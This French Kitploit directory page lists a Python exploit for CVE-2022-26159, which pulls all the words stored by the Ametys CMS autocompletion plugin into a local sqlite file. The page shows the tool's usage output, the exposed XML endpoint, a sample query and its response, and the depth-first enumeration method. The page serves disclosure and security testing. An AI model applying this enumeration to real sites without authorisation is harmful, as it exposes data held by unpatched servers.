Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26159-Ametys-Autocompletion-XML — Un exploit Python pour extraire automatiquement toutes les données stockées par le plugin d'auto-complétion d'Ametys CMS vers un fichier de base de données sqlite local. | Kitploit
Outils/GitHubGitHub/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesCollecte d'InformationsCrawler
GitHubp0dalirius/cve-2022-26159-ametys-autocompletion-xml

CVE-2022-26159-Ametys-Autocompletion-XML

Un exploit Python pour extraire automatiquement toutes les données stockées par le plugin d'auto-complétion d'Ametys CMS vers un fichier de base de données sqlite local.

Voir le dépôtSite web
1436il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-26159-Ametys-Autocompletion-XML

Un exploit Python pour extraire automatiquement toutes les données stockées par le plugin d'autocomplétion d'Ametys CMS dans un fichier de base de données sqlite local.
GitHub release (latest by date) YouTube Channel Subscribers

Fonctionnalités

  • Détection automatique du nombre maximum de résultats renvoyés par le plugin d'autocomplétion.
  • Parcours en profondeur pour extraire tous les résultats.
  • Fichier de journalisation des résultats.

Utilisation

root@kitploit:~
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius

usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        arg1 help message
  -H HEADERS, --header HEADERS
                        Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
  -k, --insecure        Disable SSL/TLS warnings and certificate verification.
  -v, --verbose         Verbose mode. (default: False)
  -q, --quiet           Quiet mode. (default: False)
  --no-colors           Disables colored output. (default: False)

Détails techniques

Le plugin d'autocomplétion d'Ametys CMS <= 4.4.9 expose publiquement un fichier XML contenant une liste de mots à l'adresse suivante :

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml

Pour effectuer une requête sur cette base de données, un attaquant a simplement besoin de saisir le début du mot dans le paramètre q (query) :

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm

Et le plugin d'autocomplétion renvoie les 10 premiers mots correspondant commençant par adm (issus de la requête) dans un fichier XML :

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
    <item>administrateur</item>
    <item>administrateurs</item>
    <item>administratif</item>
    <item>administratifs</item>
    <item>administration</item>
    <item>administrations</item>
    <item>administrative</item>
    <item>administratives</item>
    <item>administres</item>
    <item>admission</item>
</auto-completion>

Avec cela, un attaquant n'a qu'à effectuer une recherche en profondeur sur l'API pour en extraire tout le contenu.

Contribution

Les pull requests sont les bienvenues. N'hésitez pas à ouvrir une issue si vous souhaitez ajouter d'autres fonctionnalités.

Références

  • https://podalirius.net/en/cves/2022-26159/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26159
  • https://issues.ametys.org/browse/CMS-10973
  • https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/
Télécharger l’outil